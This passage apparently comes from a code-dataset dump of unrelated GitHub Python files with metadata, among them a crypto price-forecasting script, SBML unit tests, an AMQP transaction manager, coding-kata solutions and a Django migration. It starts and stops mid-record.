\"https://github.com/stormycloudy\",\r\n \"icon\": \"fab fa-github\"\r\n },\r\n {\r\n \"name\": \" LinkedIn\",\r\n \"url\": \"https://www.linkedin.com/in/shayliu/\",\r\n \"icon\": \"fab fa-linkedin-in\"\r\n }\r\n]\r\n\r\nhead_addon = r'''\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n'''\r\n\r\nfooter_addon = ''\r\n\r\nbody_addon = ''\r\n","repo_name":"stormycloudy/stormycloudy.github.io","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7184918896","text":"import yfinance as yf\nimport pandas as pd\nimport numpy as np\nfrom datetime import date\nfrom prophet import Prophet\nimport json\nfrom prophet.serialize import model_to_json\nfrom sklearn.preprocessing import MinMaxScaler\nfrom tensorflow.keras.layers import Dense, Dropout, LSTM\nfrom tensorflow.keras.models import Sequential\nfrom keras.models import load_model\n\nimport joblib\n\nimport sqlite3\n\n\ncrypto_mapping = {\"Bitcoin\": \"BTC-USD\", \n \"Ethereum\": \"ETH-USD\", \n \"Tether\": \"USDT-USD\", \n \"BNB\": \"BNB-USD\", \n \"USD Coin\": \"USDC-USD\", \n \"Solana\": \"SOL-USD\", \n \"XRP\": \"XRP-USD\", \n \"Terra\": \"LUNA-USD\", \n \"Cardano\": \"ADA-USD\", \n \"Avalanche\": \"AVAX-USD\", \n \"Dogecoin\": \"DOGE-USD\", \n \"TerraUSD\": \"UST-USD\", \n \"Binance USD\": \"BUSD-USD\", \n \"Shiba Inu\": \"SHIB-USD\",\n \"Wrapped Bitcoin\": \"WBTC-USD\"}\n\n#This function will save all historical data from crypto beggining to current uploaded day\ndef save_historical_data(df, symbol_crypto, i):\n\n conn = sqlite3.connect('data/historical_prices.db')\n c = conn.cursor()\n name = i.replace(\" \", \"\")\n\n df_sql = df\n df_sql = df_sql.rename(columns = {'Adj Close':'Adj_Close'}, inplace = False)\n c.execute('CREATE TABLE IF NOT EXISTS '+ name +' (Date, Open, High, Low, Close, Adj_Close, Volume )')\n df_sql.to_sql(name, conn, if_exists='append', index = False)\n\n return 'Ok'\n\n#This function calculates and save prophet prediction as well as its model\ndef save_prophet(df1, symbol_crypto):\n prediction_days = 365\n df1[['ds','y']] = df1 [['Date', 'Adj Close']]\n model = Prophet()\n model.fit(df1)\n future = model.make_future_dataframe(prediction_days, freq='d')\n forecast = model.predict(future)\n\n #Save the model \n\n prediction_file_path = 'data/predictions/forecast_'+ symbol_crypto + '.csv'\n model_file_path = 'data/models/serialized_model_'+ symbol_crypto + '.json'\n with open(model_file_path, 'w') as fout:\n json.dump(model_to_json(model), fout) \n\n #Save the prediction\n forecast.to_csv(prediction_file_path)\n\n return (f'{symbol_crypto} Model and Prediction saved properly')\n\n\nprediction_days = 60 #Number of past days to take into account to calculate the prediction\n\ndef save_neural_network(df2, symbol_crypto):\n\n\n df2 = yf.download(symbol_crypto, start='2010-01-01',\n end=date.today())\n df2 = df2.reset_index()\n df2['Date'] = pd.to_datetime(df2['Date'])\n\n\n scaler = MinMaxScaler(feature_range=(0,1))\n scaled_data = scaler.fit_transform(df2['Close'].values.reshape(-1,1))\n\n\n x_train, y_train = [], []\n for x in range (prediction_days, len(scaled_data)):\n x_train.append(scaled_data[x-prediction_days:x, 0])\n y_train.append(scaled_data[x, 0])\n\n x_train, y_train = np.array(x_train), np.array(y_train)\n x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1],1))\n\n\n model = Sequential()\n model.add(LSTM(units=50, return_sequences=True, input_shape=(x_train.shape[1],1)))\n model.add(Dropout(0.2))\n model.add(LSTM(units=50, return_sequences=True))\n model.add(Dropout(0.2))\n model.add(LSTM(units=50)) \n model.add(Dropout(0.2))\n model.add(Dense(units=1))\n\n model.compile(optimizer='adam', loss='mean_squared_error')\n model.fit(x_train, y_train, epochs=25, batch_size=32)\n\n #Save Scaler and Model\n scaler_filename = \"data/scalers_neural_network/\" + symbol_crypto + \"_scaler.save\"\n model_filename = \"data/models/\" + symbol_crypto + \"_keras.h5\"\n\n joblib.dump(scaler, scaler_filename) \n model.save(model_filename)\n\n return (f'{symbol_crypto} Model and scaler (Neural Network) saved properly')\n\n\n#Getting and applying functions to all listed cryptocurrencies \nfor i in crypto_mapping:\n print (crypto_mapping[i])\n symbol_crypto = crypto_mapping[i]\n\n data = yf.download(symbol_crypto, start='2010-01-01',\n end=date.today())\n data = data.reset_index()\n data['Date'] = pd.to_datetime(data['Date'])\n\n save_historical_data(data, symbol_crypto, i)\n save_prophet(data, symbol_crypto)\n save_neural_network(data, symbol_crypto)\n\n","repo_name":"ivanrepi/crypto_investment_helper","sub_path":"main_admin.py","file_name":"main_admin.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70898278914","text":"import os\nimport unittest\n\nimport libsbml\n\nfrom mod_cobra.efm.metatool_manager import convert_metabolite, convert_reaction\nimport cobra_tests\n\n__author__ = 'anna'\n\nDATA_DIR = os.path.join(os.path.dirname(os.path.abspath(cobra_tests.__file__)), 'data')\nTEST_SBML = os.path.join(DATA_DIR, 'test.xml')\n\n\ndef create_test_sbml():\n \"\"\"\n r2-> m2 <-r3-> m2_b\n <- ^\n m1_b <-r1-> m1 r6\n <- |\n r4-> m3 --r5-> m3_b\n \"\"\"\n document = libsbml.SBMLDocument(2, 4)\n model = document.createModel()\n model.setId('test_model')\n c = model.createCompartment()\n c_id = 'c'\n c.setId(c_id)\n b = model.createCompartment()\n b_id = 'b'\n b.setId(b_id)\n for m_id in ('m1', 'm2', 'm3'):\n convert_metabolite(m_id, model, False, c_id='c')\n for m_id in ('m1_b', 'm2_b', 'm3_b'):\n convert_metabolite(m_id, model, True, c_id='b')\n for (r_id, r_m_id2st, p_m_id2st, rev) in (('r1', {'m1_b': 1}, {'m1': 1}, True), ('r2', {'m1': 1}, {'m2': 1}, True),\n ('r3', {'m2': 1}, {'m2_b': 1}, True), ('r4', {'m1': 1}, {'m3': 1}, True),\n ('r5', {'m3': 1}, {'m3_b': 1}, False),\n ('r6', {'m3': 1}, {'m2': 1}, False)):\n convert_reaction(model, r_id, rev, r_m_id2st, p_m_id2st)\n libsbml.SBMLWriter().writeSBMLToFile(document, TEST_SBML)\n\n\nclass SBMLTestCase(unittest.TestCase):\n def setUp(self):\n create_test_sbml()\n\n def tearDown(self):\n if os.path.exists(TEST_SBML):\n os.remove(TEST_SBML)\n\n def test_species_num(self):\n doc = libsbml.SBMLReader().readSBML(TEST_SBML)\n model = doc.getModel()\n num_sps = model.getNumSpecies()\n self.assertEqual(6, num_sps, \"Number of species was supposed to be 6, got %d\" % num_sps)\n\n def test_reactions_num(self):\n doc = libsbml.SBMLReader().readSBML(TEST_SBML)\n model = doc.getModel()\n num_rs = model.getNumReactions()\n self.assertEqual(6, num_rs, \"Number of reactions was supposed to be 6, got %d\" % num_rs)\n\n def test_reactants_num(self):\n doc = libsbml.SBMLReader().readSBML(TEST_SBML)\n model = doc.getModel()\n r = model.getReaction('r6')\n self.assertEqual(1, r.getNumReactants(), \"Number of reactants of r6 was supposed to be 1, got %d\"\n % r.getNumReactants())\n\n def test_products_num(self):\n doc = libsbml.SBMLReader().readSBML(TEST_SBML)\n model = doc.getModel()\n r = model.getReaction('r6')\n self.assertEqual(1, r.getNumProducts(), \"Number of products of r6 was supposed to be 1, got %d\"\n % r.getNumProducts())\n\n def test_comps_num(self):\n doc = libsbml.SBMLReader().readSBML(TEST_SBML)\n model = doc.getModel()\n num_comps = model.getNumCompartments()\n self.assertEqual(2, num_comps, \"Number of compartments was supposed to be 2, got %d\" % num_comps)\n","repo_name":"annazhukova/mod_cobra","sub_path":"cobra_tests/SBMLTestCase.py","file_name":"SBMLTestCase.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"15653036333","text":"def solution(arr_val, arr_unit) :\n units = {\n 'm': 1, 'cm': 0.01, 'mm': 0.001, 'μm': 1E-6, 'ft': 0.3048,\n 'kg': 1, 'g': 0.001, 'mg': 0.000001, 'μg': 1E-09, 'lb': 0.453592,\n }\n\n\n object1_mass = arr_val[0] * units[arr_unit[0]]\n object2_mass = arr_val[1] * units[arr_unit[1]]\n distance = arr_val[2] * units[arr_unit[2]]\n G = 6.67*10**-11\n\n return G * (object1_mass * object2_mass / distance ** 2)","repo_name":"geodimitrov/Random","sub_path":"CodeWars/Python/8 kyu/find_the_force_of_gravity_between_two_objects.py","file_name":"find_the_force_of_gravity_between_two_objects.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39612653821","text":"import numpy as np\nimport pandas as pd\nimport json\nimport argparse\n\n\n\n\ndef get_tissue_samples(annotation, tissue_id):\n \n female_samples = annotation.loc[(annotation.tissue_id == tissue_id) & (annotation.sex == 'Female')].index.sort_values()\n male_samples = annotation.loc[(annotation.tissue_id == tissue_id) & (annotation.sex == 'Male')].index.sort_values()\n \n return female_samples, male_samples\n\n\n\ndef select_json(tissue_samples):\n f = open('manifests/file-manifest.json')\n data = json.load(f)\n\n selected_json = []\n for s in tissue_samples:\n for i in range(len(data)):\n if s == data[i]['file_name'].split('.')[0]:\n selected_json.append(data[i])\n\n return selected_json\n\n\ndef write_manifest(selected_json, file_manifest_out):\n\n with open(file_manifest_out, 'w') as outfile:\n json.dump(selected_json, outfile)\n \n \nparser = argparse.ArgumentParser()\n\nparser.add_argument('--tissue_samples', type=str, required=True)\nparser.add_argument('--output', type=str, required=True)\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n tissue_samples = args.tissue_samples.split('.')\n output = args.output\n \n manifest_json = select_json(tissue_samples)\n write_manifest(manifest_json, output)\n","repo_name":"cfbuenabadn/gtex-stm","sub_path":"code/scripts/make_tissue_manifest.py","file_name":"make_tissue_manifest.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8456250683","text":"import sqlite3\n\nclass CreateDB:\n \n def createData(self):\n connection = sqlite3.connect(\"tps.db\")\n\n with connection:\n connection.execute(\"CREATE TABLE tps(timestamp DATETIME, temperature NUMERIC, humidity NUMERIC)\")\n connection.close()\n\ncreate = CreateDB()\n\ndef main():\n create.createData()\n\nif __name__ == \"__main__\":\n main()\n\n ","repo_name":"AndrewAlvaro/Infosys-TransactionProcessingSystem","sub_path":"TPS/create_tables.py","file_name":"create_tables.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"17621363133","text":"import sys\nimport time\nimport logging\nlog = logging.getLogger('zen.AmqpDataManager')\n\n# DataManager class for adding msg queueing to zope and other XA\n# transaction cohorts. Usage with nested_transaction:\n#\n# with nested_transaction(AmqpDataManager(publisher.channel)) as txn:\n# # perform zope db commands\n# # perform SQLAlchemy db commands\n# publisher.publish(msg)\n#\nclass AmqpDataManager(object):\n \"\"\"Objects that manage transactional storage.\n\n These objects may manage data for other objects, or they may manage\n non-object storages, such as relational databases. For example,\n a ZODB.Connection.\n\n Note that when some data is modified, that data's data manager should\n join a transaction so that data can be committed when the user commits\n the transaction.\n \"\"\"\n\n def __init__(self, channel, txnmgr = None):\n self.channel = channel\n self.channel.tx_select()\n self.transaction_manager = txnmgr\n\n #\"\"\"The transaction manager (TM) used by this data manager.\n\n #This is a public attribute, intended for read-only use. The value\n #is an instance of ITransactionManager, typically set by the data\n #manager's constructor.\n #\"\"\")\n\n def abort(self, transaction):\n \"\"\"Abort a transaction and forget all changes.\n\n Abort must be called outside of a two-phase commit.\n\n Abort is called by the transaction manager to abort transactions\n that are not yet in a two-phase commit.\n \"\"\"\n # discard any messages that have been buffered\n log.debug(\"abort'ed\")\n if self.channel.is_open:\n self.channel.tx_rollback()\n\n # Two-phase commit protocol. These methods are called by the ITransaction\n # object associated with the transaction being committed. The sequence\n # of calls normally follows this regular expression:\n # tpc_begin commit tpc_vote (tpc_finish | tpc_abort)\n\n def tpc_begin(self, transaction):\n \"\"\"Begin commit of a transaction, starting the two-phase commit.\n\n transaction is the ITransaction instance associated with the\n transaction being committed.\n \"\"\"\n # nothing special to do here\n log.debug(\"tpc_begin'ed\")\n\n def commit(self, transaction):\n \"\"\"Commit modifications to registered objects.\n\n Save changes to be made persistent if the transaction commits (if\n tpc_finish is called later). If tpc_abort is called later, changes\n must not persist.\n\n This includes conflict detection and handling. If no conflicts or\n errors occur, the data manager should be prepared to make the\n changes persist when tpc_finish is called.\n \"\"\"\n # nothing special to do here\n log.debug(\"commit'ed\")\n\n\n def tpc_finish(self, transaction):\n \"\"\"Indicate confirmation that the transaction is done.\n\n Make all changes to objects modified by this transaction persist.\n\n transaction is the ITransaction instance associated with the\n transaction being committed.\n\n This should never fail. If this raises an exception, the\n database is not expected to maintain consistency; it's a\n serious error.\n \"\"\"\n log.debug(\"tpc_finish'ed\")\n try:\n self.channel.tx_commit()\n except Exception as e:\n log.exception(\"tpc_finish completed FAIL\")\n else:\n log.debug(\"tpc_finish completed OK\")\n\n\n def tpc_vote(self, transaction):\n \"\"\"Verify that a data manager can commit the transaction.\n\n This is the last chance for a data manager to vote 'no'. A\n data manager votes 'no' by raising an exception.\n\n transaction is the ITransaction instance associated with the\n transaction being committed.\n \"\"\"\n # Nothing to do here\n log.debug(\"tpc_voted\")\n\n\n def tpc_abort(self, transaction):\n \"\"\"Abort a transaction.\n\n This is called by a transaction manager to end a two-phase commit on\n the data manager. Abandon all changes to objects modified by this\n transaction.\n\n transaction is the ITransaction instance associated with the\n transaction being committed.\n\n This should never fail.\n \"\"\"\n log.debug(\"tpc_abort'ed\")\n try:\n self.channel.tx_rollback()\n except Exception as e:\n log.exception(e)\n log.debug(\"tpc_abort failed with exception\")\n else:\n log.debug(\"tpc_abort completed\")\n\n\n def sortKey(self):\n \"\"\"Return a key to use for ordering registered DataManagers.\n \"\"\"\n\n # this data manager must always go last\n return \"~~~~~~~\"\n\n#\n# usage outside of zope transaction\n# with AmqpTransaction(publisher.channel) as txn:\n# publisher.publish(msg)\n# publisher.publish(msg2)\n#\nclass AmqpTransaction(object):\n def __init__(self, channel):\n self.datamgr = AmqpDataManager(channel)\n self.txnid = int(time.clock()*1e6) % sys.maxint\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n if type is None:\n try:\n self.datamgr.tpc_begin(self.txnid)\n self.datamgr.commit(self.txnid)\n self.datamgr.tpc_vote(self.txnid)\n self.datamgr.tpc_finish(self.txnid)\n except Exception as e:\n self.datamgr.tpc_abort(self.txnid)\n raise\n else:\n try:\n self.datamgr.abort(self.txnid)\n except Exception as e:\n pass\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenUtils/AmqpDataManager.py","file_name":"AmqpDataManager.py","file_ext":"py","file_size_in_byte":5638,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"}
+{"seq_id":"20050376648","text":"from typing import Optional\n\nfrom nonebot.exception import ActionFailed\nfrom nonebot.log import logger\n\nfrom ..getter import UserInfoGetter, register_user_info_getter\nfrom ..image_source import DiscordUserAvatar\nfrom ..user_info import UserInfo\n\ntry:\n from nonebot.adapters.discord import Bot, Event, MessageEvent\n\n @register_user_info_getter(Bot, Event)\n class Getter(UserInfoGetter[Bot, Event]):\n async def _get_info(self, user_id: str) -> Optional[UserInfo]:\n user = None\n\n if isinstance(self.event, MessageEvent) and user_id == str(\n self.event.author.id\n ):\n user = self.event.author\n\n if not user and user_id == self.bot.self_id:\n try:\n user = await self.bot.get_current_user()\n except ActionFailed as e:\n logger.warning(f\"Error calling get_current_user: {e}\")\n\n if not user:\n try:\n user = await self.bot.get_user(user_id=int(user_id))\n except ActionFailed as e:\n logger.warning(f\"Error calling get_user: {e}\")\n\n if user:\n return UserInfo(\n user_id=str(user.id),\n user_name=user.username,\n user_avatar=DiscordUserAvatar(\n user_id=user.id, image_hash=user.avatar\n )\n if user.avatar\n else None,\n )\n\nexcept ImportError:\n pass\n","repo_name":"noneplugin/nonebot-plugin-userinfo","sub_path":"nonebot_plugin_userinfo/adapters/discord.py","file_name":"discord.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"61"}
+{"seq_id":"17521195601","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 3 11:08:17 2019\n\n@author: Luo XiYang\n\"\"\"\nimport os\nfrom itertools import groupby\n'''some tools'''\nclass AID:\n '''This function determines whether the numbers in a list are continuous and returns a continuous range.'''\n def ContinuousDigitalRange(list_X):\n minRange=[];maxRange=[];\n fun = lambda x: x[1]-x[0]\n for k, g in groupby(enumerate(list_X), fun):\n l1 = [j for i, j in g] # A list of consecutive numbers\n if len(l1) > 1:\n scop = str(min(l1)) + '-' + str(max(l1)) # Connect Continuous Digital Range with \"-\"\n minRange.append(min(l1));maxRange.append(max(l1));\n else:\n scop = l1[0]\n minRange.append(l1[0]);maxRange.append(l1[0]);\n #print(\"Continuous digital range:{}\".format(scop))\n #print(minRange);print(maxRange);\n return minRange,maxRange\n \n def ContinuousDigitalRange2(list_X):\n minRange=[];maxRange=[];\n fun = lambda x: x[1]-x[0]\n for k, g in groupby(enumerate(list_X), fun):\n l1 = [j for i, j in g] # A list of consecutive numbers\n if len(l1) > 1:\n if min(l1)==0:\n minRange.append(min(l1));maxRange.append(max(l1)+1);\n else:\n minRange.append(min(l1)+1);maxRange.append(max(l1)+1);\n else:\n minRange.append(l1[0]+1);maxRange.append(l1[0]+1);\n #print(\"Continuous digital range:{}\".format(scop))\n #print(minRange);print(maxRange);\n return minRange,maxRange\n \n def StatisticalNumber(listX):\n '''One-dimensional list: False; other:True'''\n Flag=isinstance(listX[0], list)\n if Flag==False:\n return len(listX)\n else:\n '''Two dimensional list'''\n Flag2=isinstance(listX[0][0], list)\n if(Flag2==False):\n return len(listX),len(listX[0])\n else:\n return \"no such a list\"\n def countFile(dirX):\n tmp = 0\n for item in os.listdir(dirX):\n if os.path.isfile(os.path.join(dirX, item)):\n tmp += 1\n else:\n tmp += AID.countFile(os.path.join(dirX, item))\n return tmp\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","repo_name":"XiYang-Luo/Python-mgf-file-informations-extract","sub_path":"aid.py","file_name":"aid.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"34025741716","text":"import json\r\nimport re\r\nfrom method.atom import Atom\r\n\r\n\r\nif __name__ == \"__main__\":\r\n with open('structure compare.json', 'r+') as fp:\r\n result_json = json.load(fp)\r\n result = []\r\n for element in result_json:\r\n element = json.loads(element)\r\n for key, value in element.items():\r\n if re.match('type', key):\r\n continue\r\n elif re.match('su', key) or re.match('un', key):\r\n atom_list = []\r\n for pair in value:\r\n tmp = []\r\n for atom in pair:\r\n atom_json = json.loads(atom)\r\n tmp.append(Atom(atom_json['pos'], type=atom_json['type'], num=atom_json['num']))\r\n atom_list.append(tmp)\r\n element[key] = atom_list\r\n else:\r\n atom_list = []\r\n for atom in value:\r\n atom_json = json.loads(atom)\r\n atom_list.append(Atom(atom_json['pos'], type=atom_json['type'], num=atom_json['num']))\r\n element[key] = atom_list\r\n result.append(element)\r\n print(result)\r\n","repo_name":"jingslaw/cluster_embedded_model","sub_path":"method/readjson.py","file_name":"readjson.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7525263205","text":"from swiftly.runtime.python.frameworks.django.main import detect_django, run_check\n\nFRAMEWORK_CONFIG = {\n \"name\": \"django\",\n \"type\": \"web\",\n \n # a python function that detects if runtime is the current runtime (in this case, detect if it's a python runtime)\n \"detect\": detect_django,\n \n # a list of custom functions. \"command\": \"shell/bat function name\"\n \"custom\": {\n \"migrate\": \"manage_django_commands\",\n \"makemigrations\": \"manage_django_commands\",\n },\n \n \"framework_commands\" : ['makeapp', 'run'],\n \"run_check\": run_check\n}","repo_name":"brainspoof/swiftly-sys","sub_path":"swiftly/runtime/python/frameworks/django/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"4497210903","text":"# Naive Solution\n\nn = 942\nsum = 0\nwhile n>0 or sum >9:\n if n==0:\n n=sum\n sum=0\n sum+=n%10\n n//=10\nprint(sum)\n\n# One Liner\n\nn = 493193 \nprint(n if n<10 else n%9)\nprint(n%9 or n and 9)","repo_name":"shubham2704/competetive_coding","sub_path":"codewars/sumOfDigits.py","file_name":"sumOfDigits.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"36337059527","text":"# friend or foe\ndef friend(arr):\n friends = []\n for word in arr:\n if len(word) == 4:\n friends.append(word)\n return friends\n\n# refactor\n# def friend(x):\n# return [f for f in x if len(f) == 4]\n\n# disemvowel trolls\ndef disemvowel(string_):\n for i in \"aeiouAEIOU\":\n string_ = string_.replace(i,\"\")\n return string_\n\n# refactor\n# def disemvowel(string):\n# return \"\".join(c for c in string if c.lower() not in \"aeiou\")\n\n# odd or even\ndef odd_or_even(arr):\n sum = 0\n for n in arr:\n sum += n\n return 'even' if sum % 2 == 0 else 'odd'\n\n# refactor\n# def oddOrEven(arr):\n# return 'even' if sum(arr) % 2 == 0 else 'odd'","repo_name":"pwong09/codewars","sub_path":"python/7kyu.py","file_name":"7kyu.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16924375935","text":"from PyQt5 import QtCore\n\nfrom DyCommon.Ui.DyTableWidget import *\nfrom EventEngine.DyEvent import *\n\n\nclass DyStockTradeCapitalWidget(DyTableWidget):\n \"\"\"\n 股票交易账户资金状况窗口\n !!!券商接口推送的原始数据\n \"\"\"\n signal = QtCore.pyqtSignal(type(DyEvent()))\n\n\n def __init__(self, eventEngine, broker):\n super().__init__(None, True, False)\n\n self._eventEngine = eventEngine\n self._broker = broker\n\n self._headerSet = False\n\n self._registerEvent()\n\n def _signalEmitWrapper(self, event):\n self.signal.emit(event)\n\n def _registerEvent(self):\n self.signal.connect(self._stockCapitalUpdateHandler)\n self._eventEngine.register(DyEventType.stockCapitalUpdate + self._broker, self._signalEmitWrapper)\n self._eventEngine.register(DyEventType.stockCapitalTickUpdate + self._broker, self._signalEmitWrapper)\n\n def _unregisterEvent(self):\n self.signal.disconnect(self._stockCapitalUpdateHandler)\n self._eventEngine.unregister(DyEventType.stockCapitalUpdate + self._broker, self._signalEmitWrapper)\n self._eventEngine.unregister(DyEventType.stockCapitalTickUpdate + self._broker, self._signalEmitWrapper)\n \n def _stockCapitalUpdateHandler(self, event):\n header = event.data['header']\n rows = event.data['rows']\n\n if not self._headerSet:\n self.setColNames(header)\n self._headerSet = True\n\n # strip\n for row in rows:\n if isinstance(row[0], str):\n row[0] = row[0].strip()\n\n self[0] = rows[0]\n\n def closeEvent(self, event):\n self._unregisterEvent()\n\n return super().closeEvent(event)\n","repo_name":"MicroEngine/DevilYuan","sub_path":"Stock/Trade/Ui/Basic/Account/DyStockTradeCapitalWidget.py","file_name":"DyStockTradeCapitalWidget.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":222,"dataset":"github-code","pt":"61"}
+{"seq_id":"40143743216","text":"def transposeMatrix(matrix):\n length = len(matrix)\n for i in range(length):\n for j in range(i, length):\n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n\n for i in range(length):\n for j in range(length // 2):\n matrix[i][j], matrix[i][length - 1 - j] = matrix[i][length - 1 - j], matrix[i][j]\n\n return matrix\n\n\na = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\nprint(transposeMatrix(a))\n\n\n","repo_name":"guillsav/Technical-Practice","sub_path":"transpose-matrix/transposeMatrix.py","file_name":"transposeMatrix.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4909646955","text":"import PySimpleGUI as sg\n\nfrom DataVisualization.View.DataVisualizationView import *\nfrom DataVisualization.View.DataMergerView import *\nfrom DataVisualization.ViewModel.DataMergerViewModel import DataMergerViewModel\nfrom DataVisualization.ViewModel.DataVisualizationViewModel import *\n\nfrom WindowApp import WindowApp\n\n\nclass DataVisualizationApp(WindowApp):\n def __init__(self, mainAsyncLoop) -> None:\n window = sg.Window(title=\"Data Visualization\", layout=DataVisualizationApp._CreateLayout(),\n margins=(0, 0))\n self.window = window\n viewModels = [\n DataVisualizationViewModel(self),\n DataMergerViewModel(self)\n ]\n\n super().__init__(mainAsyncLoop, window, viewModels)\n\n def _OnAppCloseEvent(self) -> bool:\n choice = \"Yes\"\n self.asyncTaskManager.RemoveIdleTasks()\n if len(self.asyncTaskManager.currentTasks) > 0:\n # Create Popup to notify user that a crawling thread is still active.\n # User can choose to cancel it.\n choice, _ = sg.Window('Cancel Analysis',\n [[sg.T('Analyzer is still actively analyzing, cancel analysis?')],\n [sg.Yes(s=10), sg.No(s=10)]], disable_close=True).read(close=True)\n\n # Default if no thread/task.\n # or when user choose to cancel.\n if choice == \"Yes\":\n self.asyncTaskManager.EndAllTask()\n self.CloseApp()\n return True\n return False\n\n def _CreateLayout():\n # NOTE: App View\n APP_TAB_GROUP = sg.TabGroup(\n [[\n sg.Tab(\"Analyze\", CreateVisualizationViewLayout()),\n sg.Tab(\"Merger\", CreateMergerViewLayout())\n ]]\n )\n\n return [\n [APP_TAB_GROUP]\n ]","repo_name":"wqyeo/ScamDataAnalysis","sub_path":"DataVisualization/DataVisualizationApp.py","file_name":"DataVisualizationApp.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"23451206451","text":"#!/usr/bin/env python3\n\ndef do_testcase():\n S_max, S = input().split()\n S_max = int(S_max)\n S = list(map(int, S))\n invite = total = 0\n for k in range(S_max + 1):\n if total >= S_max:\n break\n if total < k:\n n = k - total\n invite += n\n total += n\n total += S[k]\n else:\n n = S_max - total\n if n > 0:\n invite += S_max - total\n return max(0, invite)\n\nT = int(input())\nfor t in range(1, T + 1):\n result = do_testcase()\n print('Case #{}: {}'.format(t, result))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/2156.py","file_name":"2156.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"18022399035","text":"from .selector import Selector\nimport random\nimport numpy as np\n\nclass Curiosity_Driven_Selector(Selector):\n\t\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\n\tdef select(self,container,num_samples):\n\t\t\"\"\"Do a weighted selection based on curiosity scores. container is dict of dicts {\"bin_index\":{\"genome\",\"curiosity\",other details},...}\n\t\tprint a warning if num_samples is more than container size\"\"\"\n\t\tpopulation = []\n\t\tcuriosity = []\n\t\tfor bin_index,bin_value in container.items():\n\t\t\tpopulation.append([bin_index,bin_value])\n\t\t\tcuriosity.append(bin_value[\"curiosity\"])\n\t\tcuriosity = np.array(curiosity)\n\t\t\n\t\tpopulation_size = len(population)\n\n\t\tif(num_samples>population_size):\n\t\t\tself.logger.warning(\"from Curiosity selector- number of samples queried from container exceed it's size,\"+\n\t\t\t \"returning all genomes\")\n\t\t\tnum_samples = population_size\n\t\t\n\t\t#normalise so that it becomes a probbility distribution\n\t\tcuriosity = curiosity/np.sum(curiosity)\n\t\tselected_indices = np.random.choice(a=population_size,size=num_samples,replace=False,p=curiosity)\n\t\treturn [population[index] for index in selected_indices]\n","repo_name":"sandipan1/EVO-RBC","sub_path":"evo_rbc/qd_solver/selector/curiosity_driven_selector.py","file_name":"curiosity_driven_selector.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72672148673","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('blog', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Entry',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('text', models.TextField(verbose_name='Blog entry text')),\n ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created at')),\n ('edited', models.DateTimeField(auto_now=True, verbose_name='Edited at')),\n ('author', models.ForeignKey(verbose_name='Author', to=settings.AUTH_USER_MODEL)),\n ('categories', models.ManyToManyField(to='blog.Category', null=True, verbose_name='Categories', blank=True)),\n ],\n options={\n 'verbose_name_plural': 'Entries',\n },\n bases=(models.Model,),\n ),\n migrations.AlterModelOptions(\n name='category',\n options={'verbose_name_plural': 'Categories'},\n ),\n migrations.AlterField(\n model_name='category',\n name='name',\n field=models.CharField(max_length=255, 